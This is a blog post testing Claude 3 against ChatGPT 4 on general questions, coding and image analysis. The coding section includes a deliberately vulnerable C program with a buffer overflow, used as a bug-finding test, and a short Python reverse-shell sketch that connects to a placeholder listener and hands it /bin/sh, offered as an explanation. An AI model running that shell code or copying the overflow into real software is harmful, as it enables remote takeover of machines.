Claude 3, a family of natural language AI models developed by Anthropic, has made a breakthrough by beating today’s standard, ChatGPT 4.0, on benchmarks. We previously published an article explaining the benchmarks and the Claude 3 models.
But those were on-paper results. Here we’ll test the Claude 3 models (Opus and Sonnet) against ChatGPT 4.0 and see whether Claude 3 is as good as it claims.
These tests are divided into three sections: general, code, and image analysis. Let’s get into it.
If you haven’t already, make sure to check our article on Claude 3. It’s a high-level rundown that covers its benchmark performance and other dope info you’ll wanna know.
General
Here, we will run a few tests to see the response style and overall knowledge of each model. First, we’ll ask a few general questions.
Prompt: “Who won the Nobel Prize in Physics in 2020?”
Here both GPT 4 and Claude 3 Sonnet gave the right answer (Roger Penrose, Reinhard Genzel, and Andrea Ghez).
Next, we had GPT 4 and Sonnet translate the answer into Chinese. It looks like both AIs can translate English to Chinese and vice versa while keeping the meaning intact.
Next, we tried out some basic riddles, and in most cases both AIs (GPT 4 and Sonnet) responded the same way.
We performed many other tests on reasoning, logic, basic math, real-life suggestions, and more. In most cases GPT 4 and Claude 3 Sonnet responded similarly, though the Claude 3 models (Sonnet and Opus) produced better output, which felt more human-like than GPT 4’s. Since the outputs were mostly the same, we decided not to include them here.
Code
In this section, we’ll ask ChatGPT and Claude to create scripts for automating tasks, convert a program from one language to another while preserving its functionality, and analyze code to identify bugs and explain them. These tests won’t be intensive, but they cover general tasks a coder might need.
Test 1 – Creating Automation Scripts
First, we’ll ask ChatGPT 4.0 to create a Python script that takes URLs from a text file, captures full-page screenshots of those pages, and saves them as PNG files.
Prompt: “Make me a python script that will automatically browse the URLs from a txt file and take full screenshots of the webpage also top to bottom and save it in a png file.”
Just copy-pasting the script into a file and running it gave us some errors, shown below.
When we passed this error back to ChatGPT, it suggested installing the Chrome browser or using Firefox instead. In the next prompt, I asked it to use Firefox, since I already had Google Chrome installed.
This time it gave me a few instructions for installing `geckodriver`. So I installed it and ran the new script.
Now the script worked and I got the images I wanted in the current directory.
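For reference, the working Firefox version looked roughly like the sketch below. This is a minimal sketch, assuming Selenium 4+ with `geckodriver` on the PATH; `urls.txt` and the output filenames are illustrative, not ChatGPT’s exact code.

```python
from selenium import webdriver
from selenium.webdriver.firefox.options import Options

# Run Firefox headlessly so no browser window pops up.
options = Options()
options.add_argument("--headless")
driver = webdriver.Firefox(options=options)

# Read one URL per line from the text file, skipping blank lines.
with open("urls.txt") as f:
    urls = [line.strip() for line in f if line.strip()]

for i, url in enumerate(urls, start=1):
    driver.get(url)
    # Firefox's driver supports native full-page (top-to-bottom) captures.
    driver.get_full_page_screenshot_as_file(f"screenshot_{i}.png")

driver.quit()
```

Firefox is the easy path here because its driver exposes a one-call full-page screenshot; with Chrome, full-page capture typically needs scrolling and stitching or a DevTools command.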
Claude 3 – Opus
Doing the same thing with Claude 3 Opus produced the code along with instructions on what needs to be done before executing the script. The code from Claude 3 Opus is much easier to understand than GPT 4’s.
Running this code without modifying anything worked on the first try, and it used Chrome, not Firefox. This time the screenshots were also saved in a new directory.
The images it captured were fine, but the screen size was smaller than in ChatGPT’s version. That was also fixed as soon as we mentioned it in a follow-up prompt.
Test 2 – Converting language
In this test, we will convert a Java program that turns a string into an MD5 hash into a Go program. We started with ChatGPT, using the prompt “can you convert the code behavior in go language ```code```”.
It delivered code that converts the string to an MD5 hash, and it worked on the first go.
Claude 3 – Opus
Using the same prompt with Claude 3 Opus produced the code with a better explanation than GPT 4 provided. Claude 3 also showed the output hash for the provided string.
And it’s not making that up: it’s the actual MD5 hash of the provided string.
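A claim like that is easy to verify yourself. For example, a quick Python check (using "hello world" as a stand-in, since the original string from the test isn’t reproduced here):

```python
import hashlib

# MD5-hash a string and print the hex digest, the same behavior the
# converted Go program implements. "hello world" is only a stand-in.
text = "hello world"
print(hashlib.md5(text.encode("utf-8")).hexdigest())
# -> 5eb63bbbe01eeed093cb22bb8f5acdc3
```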
Test 3 – Check for bugs
In this test, we are going to give both models a C program with a buffer overflow bug: `read(0, name, 0x100)` reads up to 0x100 (256) bytes into a buffer that is only 100 bytes long. This is a very common class of bug that often leads to RCE and total system compromise.
Prompt: “is there any bug in my code ```#include <stdio.h>
int main() {
    int secret = 0xdeadbeef;
    char name[100] = {0};
    read(0, name, 0x100);
    if (secret == 0x1337) {
        puts("Wow! ");
    } else {
        puts("Hello");
    }
}```”
ChatGPT was able to find the bug and point out exactly where it occurs.
Claude 3 – Opus
Just like ChatGPT, Claude 3 was able to detect the vulnerability, but in addition it walked through the entire code and explained its behaviour. It also provided a bug-free version of the code.
Test 4 – Analyze the code
In this test, we’ll provide ChatGPT with a PHP reverse shell and ask it to explain the code in detail. The prompt used here is “can you tell me whats going on here in details ```code```”.
ChatGPT explained it by grouping the actions together. It was also able to detect the reverse shell.
Claude 3 – Opus
Using the same prompt with Opus gave us a much better explanation than ChatGPT’s. Here the explanation is given point by point instead of in groups. It was also able to detect the reverse shell.
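For context, a reverse shell is a payload that connects out from the victim machine to an attacker-controlled listener and attaches a shell to that connection. The test used a PHP payload (not reproduced here); conceptually, it boils down to something like this Python sketch, where `HOST` and `PORT` are placeholders for the listener:

```python
import socket
import subprocess

# Placeholder listener address (attacker-controlled in a real attack).
HOST, PORT = "203.0.113.1", 4444

# Connect out to the listener, then wire a shell's stdin/stdout/stderr
# straight to the socket, handing the remote side an interactive shell.
# (Unix-only sketch; the actual test payload was PHP.)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
subprocess.run(["/bin/sh", "-i"],
               stdin=s.fileno(), stdout=s.fileno(), stderr=s.fileno())
```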
Image Analysis
In image analysis, we’ll test facial recognition, detecting multiple subjects in an image, and recognizing geo-locations.
Test 1 – Facial Recognition
Here we provided an image of the Mona Lisa and prompted “Do you know him?” (the “him” was intentional). Both ChatGPT 4 and Claude 3 Sonnet recognized the image as the Mona Lisa.
Next, we provided an image of Barack Obama without asking any question. Here GPT 4 didn’t recognize him at first, but it did once we asked about the person in the image.
Claude 3 Sonnet, however, recognized him from the image alone.
Test 2 – Recognizing multiple subjects
In this test, we provided an image containing 7 animals and asked both AIs to count them and identify each animal.
Here both AIs got the total count wrong, but GPT 4 also named one of the animals incorrectly.
Next, we tested with an image that had multiple shapes in it.
Here ChatGPT 4 missed one shape, while Claude 3 Sonnet detected all 9 shapes in the image.
Test 3 – Checking GEO Locations
In this test, we provided a map image with a mark on Indonesia and asked both AIs to name the country. ChatGPT 4 failed the test, unable to recognize the map.
Claude 3 Sonnet, on the other hand, identified the country correctly.
This test was done in the Amazon Bedrock client, but the model is the same one you get on the official website. Amazon Bedrock lets you use multiple AI models in one place.
We ran several other image tests. In most cases, Claude 3 Sonnet’s answers were better than GPT 4’s; Claude 3 understood the intent behind a question better than ChatGPT 4.
Conclusions
After performing many tests with both AIs, including general tasks, coding, logic, analysis, reasoning, and more, it’s clear that Claude 3 is better than ChatGPT 4. It keeps a tone that feels like talking to a human, understands the true meaning behind questions, and provides appropriate answers.
But ChatGPT still offers more features than Claude 3. With GPT 4 you can browse the internet, generate images, and build your own custom bot in the ChatGPT console. As soon as Claude 3 adopts these features, though, I see no reason to use ChatGPT, because the subscription cost of both AIs is the same.
In conclusion, both AIs work great. You should try both and pick whichever works best for you. I’ve been using GPT 4 since it was released and I still use it every day, but if OpenAI doesn’t bring an update that beats Claude 3, I’ll most likely switch. Thank you for reading.